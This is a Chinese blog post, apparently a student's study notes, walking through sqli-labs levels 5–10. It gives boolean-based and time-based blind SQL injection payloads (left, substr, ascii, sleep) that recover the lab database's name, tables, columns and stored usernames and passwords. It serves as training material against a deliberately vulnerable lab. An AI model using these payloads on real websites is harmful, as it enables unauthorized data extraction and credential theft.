sql-labs继续闯关 5~10

学习目标:

sql-labs5-10关

学习时间:

2021.4.4

学习产出:

前言:

清明节放三天假,哎!都去玩了,都去玩了,留下孤独的我与阿尉在学校周围乱转,不过,正好在这个时间把之前学习过的没整理的学习产出整理下来,再学习一点新的东西!
在这里插入图片描述

补充:

咱们先补充一些知识点,布尔盲驻,注入的语句返回只会返回1和0,1就是对的,而0就是错的!

left()函数: left(database(),1)=‘s’ left(a,b)从截取a的前b位,正确则返回1,错误则返回0
regexp函数: select user() regexp ‘r’ user()的结果是root,regexp为匹配root的正则表达式
like函数:select user() like ‘ro%’ 匹配与regexp相似
sbustr(a,b,c) select substr() xx xx substr(a,b,c)从位置b开始,截取a字符串c位长度
ascii() 将某个字符串转化为ascii的值

chr(‘数字’) 或者是ord(‘字母’) 使用python中的两个函数可以判断当前的ascii值是多少
对于security数据库:
注入时 注意加and

left((select database()),1)='s'--+         前1位是否是s 
(select database()) regexp 's';       匹配第一个字符是否是s
(select database()) like 's%';     匹配第一个字符是否是s
(select substr((select database()),1,1))='s'; 匹配第一个字符是否是s
(select substr ((select database()),1,3))='sec';  匹配前三个字符是否是sec
(select ascii(substr((select database()),1,1)));  直接回显115  或者是  s
(select ascii(substr((select database()),1,1)))>110;  如果大于110,就会返回1,

否则返回0
sleep函数
时间延迟型手工注入,正确会延迟,错误没有延迟。
可以通过浏览器的刷新提示观察延迟情况,但是id正确的时候的回显有利于观察。
构造sql语句,带上时间延迟的函数,如果有明显的延迟说明有注入点。

第五关:

闭合符号的判断都没啥说的了,然后直接order by 判断列数, 咱们直接上干货!

?id=1’ and if(length(database())=8,sleep(5),1)--+

当你的数据库长度为8时,输出就会延迟5秒钟,如果不是8,则不会延迟
在这里插入图片描述
说明数据库的长度是8,然后下一步就是爆出数据库

?id=1' and left((select database()),1)='s'--+ 
?id=1' and left((select database()),2)='se'--+ 
.
.
.
?id=1' and left((select database()),8)='security'--+ 

然后下一步就是猜表名

?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)='users'--+

然后就是判断列名

?id=1' and left((select column_name from information_schema.columns where table_name= 'users' limit 4,1),8)='username'--+

limit 4,1是username,limit 3,1是id
limit 5,1是password
最后一步就是猜值

?id=1’ and left((select password from users order by id limit 0,1),4)=‘dumb’ --+

?id=1’ and left((select username from users order by id limit 0,1),4)=‘dumb’ --+

第六关:

与第五关一样,就是前面的单引号闭合转换成了双引号闭合,这里就不阐述了.
上面的注入都是经过靶场亲自实验成功才写下来的,希望对你们有所帮助

第七关:

第七关也是布尔盲驻,也是闭合符号不同,这里也再讲一下闭合符号的判断吧
先输入一个’
在这里插入图片描述
发现报错,然后输入注释符号–+,发现还报错,说明不止是’,然后再输入),发现还是报错,说明还有东西,就再输入一个),发现就不再报错了,说明闭合符号就是’))

剩下的其实跟第五关一样

第八关:

第八关跟第五关可以说差不多真的是一模一样,先判断闭合符号,发现输入 ’ 报错,再输入–+,就不再报错,说明 ’ 就是闭合符号,剩下的输入跟第五关一模一样,就没啥说的了

第九关:

输入 ’ " 发现都不报错,咱么就加一个sleep函数,

id=1' and sleep(5) --+

会发现,当输入的是id=1’ 时,页面执行五秒后才刷新,而其他的注入都没这个效果,判断出闭合符号就是 ’
这里开始sleep函数的注入,left函数在这一题中判断不出来,无论对错,都是对的

?id=1' and if(length(database())=8,sleep(5),1)--+    
页面延迟了五秒,数据库的长度就是8

猜数据库的名字

?id=1' and if(left(database(),1)='s',sleep(5),1)--+
'
'
?id=1' and if(left(database(),1)='security',sleep(5),8)--+

猜表的名字

?id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)='users',sleep(5),5)--+

猜列的名字

?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='username',sleep(5),1)--+

limit 5,1 是password
猜最后的值

?id=1’ and if(left((select password from users order by id limit 0,1),4)=‘dumb’ ,sleep(5),1)–+

?id=1’ and if(left((select username from users order by id limit 0,1),4)=‘dumb’ ,sleep(5),1)–+

第十关:

第十关就是在第九关的基础上,只是最前面的闭合符号从刚开始的 ’ 变成了 "
其他的都不变!

加油!
在这里插入图片描述

热门文章

暂无图片
编程学习 ·

C语言二分查找详解

二分查找是一种知名度很高的查找算法,在对有序数列进行查找时效率远高于传统的顺序查找。 下面这张动图对比了二者的效率差距。 二分查找的基本思想就是通过把目标数和当前数列的中间数进行比较,从而确定目标数是在中间数的左边还是右边,将查…
暂无图片
编程学习 ·

GMX 命令分类列表

建模和计算操作命令: 1.1 . 创建拓扑与坐标文件 gmx editconf - 编辑模拟盒子以及写入子组(subgroups) gmx protonate - 结构质子化 gmx x2top - 根据坐标生成原始拓扑文件 gmx solvate - 体系溶剂化 gmx insert-molecules - 将分子插入已有空位 gmx genconf - 增加…
暂无图片
编程学习 ·

一文高效回顾研究生课程《数值分析》重点

数值分析这门课的本质就是用离散的已知点去估计整体,就是由黑盒子产生的结果去估计这个黑盒子。在数学里这个黑盒子就是一个函数嘛,这门课会介绍许多方法去利用离散点最大化地逼近这个函数,甚至它的导数、积分,甚至微分方程的解。…
暂无图片
编程学习 ·

在职阿里5年,一个28岁女软测工程师的心声

简单的先说一下,坐标杭州,14届本科毕业,算上年前在阿里巴巴的面试,一共有面试了有6家公司(因为不想请假,因此只是每个晚上去其他公司面试,所以面试的公司比较少) ​ 编辑切换为居中…
暂无图片
编程学习 ·

字符串左旋c语言

目录 题目: 解题思路: 第一步: 第二步: 第三步: 总代码: 题目: 实现一个函数,可以左旋字符串中的k个字符。 例如: ABCD左旋一个字符得到BCDA ABCD左旋两个字符…
暂无图片
编程学习 ·

设计模式--观察者模式笔记

模式的定义与特点 观察者(Observer)模式的定义:指多个对象间存在一对多的依赖关系,当一个对象的状态发生改变时,所有依赖于它的对象都得到通知并被自动更新。这种模式有时又称作发布-订阅模式、模型-视图模式&#xf…
暂无图片
编程学习 ·

睡觉突然身体动不了,什么是睡眠痽痪症

很多朋友可能有这样的体验,睡觉过程中突然意识清醒,身体却动弹不了。这时候感觉非常恐怖,希望旁边有一个人推自己一下。阳光以前也经常会碰到这样的情况,一年有一百多次,那时候很害怕晚上到来,睡觉了就会出…
暂无图片
编程学习 ·

深入理解C++智能指针——浅析MSVC源码

文章目录unique_ptrshared_ptr 与 weak_ptrstd::bad_weak_ptr 异常std::enable_shared_from_thisunique_ptr unique_ptr 是一个只移型别(move-only type,只移型别还有std::mutex等)。 结合一下工厂模式,看看其基本用法&#xff…
暂无图片
编程学习 ·

@TableField(exist = false)

TableField(exist false) //申明此字段不在数据库存在,但代码中需要用到它,通知Mybatis-plus在做写库操作是忽略它。,.
暂无图片
编程学习 ·

Java Web day15

第十二章文件上传和下载 一、如何实现文件上传 要实现Web开发中的文件上传功能,通常需要完成两步操作:一.是在Web页面中添加上传输入项;二是在Servlet中读取上传文件的数据,并保存到本地硬盘中。 需要使用一个Apache组织提供一个…
暂无图片
编程学习 ·

【51nod 2478】【单调栈】【前缀和】小b接水

小b接水题目解题思路Code51nod 2478 小b接水 题目 输入样例 12 0 1 0 2 1 0 1 3 2 1 2 1输出样例 6解题思路 可以发现最后能拦住水的都是向两边递减高度(?) 不管两个高积木之间的的积木是怎样乱七八糟的高度,最后能用来装水的…
暂无图片
编程学习 ·

花了大半天写了一个UVC扩展单元调试工具

基于DIRECTSHOW 实现的,用的是MFC VS2019. 详见:http://www.usbzh.com/article/detail-761.html 获取方法 加QQ群:952873936,然后在群文件\USB调试工具&测试软件\UVCXU-V1.0(UVC扩展单元调试工具-USB中文网官方版).exe USB中文网 USB中文…
暂无图片
编程学习 ·

贪心(一):区间问题、Huffman树

区间问题 例题一:区间选点 给定 N 个闭区间 [ai,bi]请你在数轴上选择尽量少的点,使得每个区间内至少包含一个选出的点。 输出选择的点的最小数量。 位于区间端点上的点也算作区间内。 输入格式 第一行包含整数 N,表示区间数。 接下来 …
暂无图片
编程学习 ·

C语言练习实例——费氏数列

目录 题目 解法 输出结果 题目 Fibonacci为1200年代的欧洲数学家,在他的着作中曾经提到:「若有一只免子每个月生一只小免子,一个月后小免子也开始生产。起初只有一只免子,一个月后就有两只免子,二个月后有三只免子…
暂无图片
编程学习 ·

Android开发(2): Android 资源

个人笔记整理 Android 资源 Android中的资源,一般分为两类: 系统内置资源:Android SDK中所提供的已经定义好的资源,用户可以直接拿来使用。 用户自定义资源:用户自己定义或引入的,只适用于当前应用的资源…
暂无图片
编程学习 ·

零基础如何在短时间内拿到算法offer

​算法工程师是利用算法处理事物的职业 算法(Algorithm)是一系列解决问题的清晰指令,也就是说,能够对一定规范的输入,在有限时间内获得所要求的输出。 如果一个算法有缺陷,或不适合于某个问题,执…
暂无图片
编程学习 ·

人工智能:知识图谱实战总结

人工智能python,NLP,知识图谱,机器学习,深度学习人工智能:知识图谱实战前言一、实体建模工具Protegepython,NLP,知识图谱,机器学习,深度学习 人工智能:知识图…
暂无图片
编程学习 ·

【无标题】

这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注…